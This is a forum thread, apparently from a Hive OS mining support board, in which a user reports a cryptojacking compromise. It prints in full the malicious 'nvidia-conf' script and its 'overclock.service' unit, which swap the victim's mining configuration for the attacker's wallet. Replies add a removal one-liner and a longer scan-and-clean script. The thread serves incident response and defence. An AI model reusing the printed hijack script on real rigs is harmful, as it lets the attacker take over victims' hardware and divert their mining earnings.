
HIVE MALWARE ...... started with or as "overclock.service"

Hi,
we are under attack from some idiot(s) using the bad Hive security to start a service that changes the flight sheet every 30 min…

I changed all passwords and also reinstalled Hive with hiveflasher…

I found this just an hour ago, so I don't know if the script/attacker is reproducing itself over the network (previously reinstalled without LAN connection)…

attacker address → 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C

bad service → systemctl status overclock → /lib/systemd/system/overclock.service

/sys/fs/cgroup/unified/system.slice/overclock.service# systemctl status overclock
● overclock.service - Error
Loaded: loaded (/lib/systemd/system/overclock.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2022-01-15 23:13:27 CET; 5h 1min ago
Main PID: 19552 (bash)
Tasks: 57 (limit: 4286)
CGroup: /system.slice/overclock.service
├─ 580 SCREEN -dm -c /hive/etc/screenrc.miner bash
├─ 600 bash /hive/bin/miner-run gminer 1
├─ 628 bash /hive/bin/miner-run gminer 1
├─ 679 ./gminer --algo eth --server eu1.ethermine.org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1.ethermine.org --port 14444 --user
├─ 683 /hive/miners/gminer/2.74/gminer --algo eth --server eu1.ethermine.org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1.ethermine.
├─19552 /bin/bash /usr/bin/nvidia-conf
└─24859 sleep 10m

script used → /usr/bin/nvidia-conf

#!/usr/bin/env bash
. /etc/environment
export $(cat /etc/environment | grep -vE '^$|^#' | cut -d= -f1)
loop=2
while [ $loop -le 10 ]   # $loop is never changed, so this runs forever
do
  if grep -q "0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C" "/hive-config/wallet.conf"; then
    echo "ok"
  else
    # force gminer as the only miner, then swap in the attacker's flight sheet
    sed -i -e "s/^MINER=.*/MINER=gminer/" /hive-config/rig.conf
    sed -i -e "s/^MINER2=.*/MINER2=/" /hive-config/rig.conf
    # the victim's wallet.conf is parked over the example file, not deleted
    mv /hive-config/wallet.conf /hive-config/rig-config-example.txt
    cat <<EOF > /hive-config/wallet.conf
### FLIGHT SHEET "Hivepool-ETH-GMiner(Nvidia)" ###
### Miner gminer ###
GMINER_ALGO="eth"
GMINER_TEMPLATE="0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME"
GMINER_HOST="eu1.ethermine.org
eu1.ethermine.org"
GMINER_PORT="4444
14444"
GMINER_PASS="x"
GMINER_TLS=""
GMINER_ALGO2=""
GMINER_TEMPLATE2=""
GMINER_HOST2=""
GMINER_PORT2=""
GMINER_PASS2=""
GMINER_TLS2=""
GMINER_INTENSITY=""
GMINER_USER_CONFIG=''
GMINER_VER=""

META='{"gminer":{"coin":"ETH"}}'
EOF
    dos2unix /hive-config/wallet.conf
    dos2unix /hive-config/rig.conf
    sleep 30m
    /hive/bin/miner restart
  fi
  /hive/bin/miner start
  sleep 10m
  echo loop restarting
done

I removed the script … let’s see what happens next -.-

Has anyone had the same problem?

regards

1 Like

No suspicious activity until now …

Here is my snippet to delete the service as well as the attacker's "nvidia-conf":

systemctl stop overclock.service && rm -f /lib/systemd/system/overclock.service && rm -f /usr/bin/nvidia-conf

Send this in hive-shell or with the "send command" action.

Change your passwords with the help of the Hive security guide…

1 Like
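The indicators in the first post (the overclock.service unit, the /usr/bin/nvidia-conf script, the attacker wallet in wallet.conf) and the removal one-liner in the reply above, put together as one scan-and-clean script. This is an added example, not code from the thread or from Hive OS. The ROOT argument, the constructed sample tree with its placeholder victim wallet 0xVICTIMWALLET, the renamed gpu-tune.service copy, and the "FLIGHT SHEET" header check used to recognise a wallet.conf are assumptions for illustration; the recovery of the victim's flight sheet from rig-config-example.txt follows the mv line in the posted script.

```shell
#!/usr/bin/env bash
# Added example (not from the thread or from Hive OS): scan a root directory
# for the indicators described above and clean them up. ROOT is an assumed
# parameter so the same functions run against a copy of a rig's filesystem
# or the constructed sample tree below, not only against "/".

ATTACKER_WALLET="0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C"   # from the thread
IOC_SCRIPT="usr/bin/nvidia-conf"
IOC_UNIT="lib/systemd/system/overclock.service"
WALLET_CONF="hive-config/wallet.conf"
# The script's "mv" line parks the victim's wallet.conf over this file.
WALLET_BACKUP="hive-config/rig-config-example.txt"

# ioc_units ROOT: print every unit that is the known overclock.service or
# that launches /usr/bin/nvidia-conf under another name.
ioc_units() {
    local root="${1%/}" unit
    for unit in "$root"/lib/systemd/system/*.service "$root"/etc/systemd/system/*.service; do
        [ -f "$unit" ] || continue
        if [ "$unit" = "$root/$IOC_UNIT" ] || grep -q "/$IOC_SCRIPT" "$unit"; then
            echo "$unit"
        fi
    done
}

# scan_root ROOT: print one "kind: detail" line per hit; exit 0 only when clean.
scan_root() {
    local root="${1:-/}" hits
    root="${root%/}"
    ioc_units "$root" | sed 's/^/unit: /'
    hits=$(ioc_units "$root" | grep -c . || true)
    if [ -f "$root/$IOC_SCRIPT" ]; then
        echo "script: $root/$IOC_SCRIPT"
        hits=$((hits + 1))
    fi
    if [ -f "$root/$WALLET_CONF" ] && grep -q "$ATTACKER_WALLET" "$root/$WALLET_CONF"; then
        echo "wallet: $root/$WALLET_CONF mines to $ATTACKER_WALLET"
        hits=$((hits + 1))
    fi
    [ "$hits" -eq 0 ]
}

# clean_root ROOT: stop and remove the units (systemctl only on a live "/"),
# delete the script, and put the victim's own flight sheet back if the
# malware's backup copy still holds one (recognised by its "FLIGHT SHEET"
# header, an assumption based on the wallet.conf format shown in the thread).
clean_root() {
    local root="${1:-/}" live=false unit
    root="${root%/}"
    if [ -z "$root" ] && command -v systemctl >/dev/null 2>&1; then live=true; fi
    ioc_units "$root" | while IFS= read -r unit; do
        if $live; then systemctl disable --now "$(basename "$unit")" 2>/dev/null || true; fi
        rm -f "$unit"
    done
    rm -f "$root/$IOC_SCRIPT"
    if [ -f "$root/$WALLET_CONF" ] && grep -q "$ATTACKER_WALLET" "$root/$WALLET_CONF"; then
        if [ -f "$root/$WALLET_BACKUP" ] && grep -q 'FLIGHT SHEET' "$root/$WALLET_BACKUP" \
           && ! grep -q "$ATTACKER_WALLET" "$root/$WALLET_BACKUP"; then
            mv -f "$root/$WALLET_BACKUP" "$root/$WALLET_CONF"
        else
            rm -f "$root/$WALLET_CONF"   # re-apply the flight sheet from the Hive web UI
        fi
    fi
    if $live; then systemctl daemon-reload; fi
}

# make_sample_root DIR: a constructed, infected-looking tree for the demo and
# tests. 0xVICTIMWALLET and gpu-tune.service are placeholders, not real data.
make_sample_root() {
    local root="$1"
    mkdir -p "$root/lib/systemd/system" "$root/etc/systemd/system" "$root/usr/bin" "$root/hive-config"
    printf '[Unit]\nDescription=Error\n[Service]\nExecStart=/bin/bash /usr/bin/nvidia-conf\n[Install]\nWantedBy=multi-user.target\n' \
        > "$root/lib/systemd/system/overclock.service"
    printf '[Service]\nExecStart=/bin/bash /usr/bin/nvidia-conf\n' > "$root/etc/systemd/system/gpu-tune.service"  # renamed copy
    printf '[Service]\nExecStart=/usr/sbin/sshd -D\n' > "$root/lib/systemd/system/ssh.service"  # benign, must not be flagged
    printf '#!/usr/bin/env bash\n' > "$root/$IOC_SCRIPT"
    printf '### FLIGHT SHEET "Hivepool-ETH-GMiner(Nvidia)" ###\nGMINER_TEMPLATE="%s.WORKERNAME"\n' "$ATTACKER_WALLET" > "$root/$WALLET_CONF"
    printf '### FLIGHT SHEET "my-eth" ###\nGMINER_TEMPLATE="0xVICTIMWALLET.rig1"\n' > "$root/$WALLET_BACKUP"
}

demo() {
    local root; root=$(mktemp -d)
    make_sample_root "$root"
    echo "== before =="; scan_root "$root" || true
    clean_root "$root"
    echo "== after =="; scan_root "$root" && echo "clean; restored $WALLET_CONF:" && cat "$root/$WALLET_CONF"
    rm -rf "$root"
}

case "${1:-}" in
    --demo)  demo ;;                    # bash hive_ioc.sh --demo
    --scan)  scan_root "${2:-/}" ;;     # bash hive_ioc.sh --scan /
    --clean) clean_root "${2:-/}" ;;    # bash hive_ioc.sh --clean /
esac
```

On a live rig run `--scan /` first and read the hits, then `--clean /`. Compared with the one-liner above, `systemctl disable --now` also removes the `enabled` symlink that `rm -f` on the unit file leaves dangling under multi-user.target.wants, and `daemon-reload` makes systemd forget the unit. Afterwards re-apply your own flight sheet from the web interface and rotate the rig password as the thread advises, since removing the unit only undoes the persistence, not the access the attacker used to install it.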

Speculating: are the rigs assigned routable addresses, vs. sitting behind NAT with non-routable addressing?

Appreciate you sharing the data. Thanks.

This topic was automatically closed 416 days after the last reply. New replies are no longer allowed.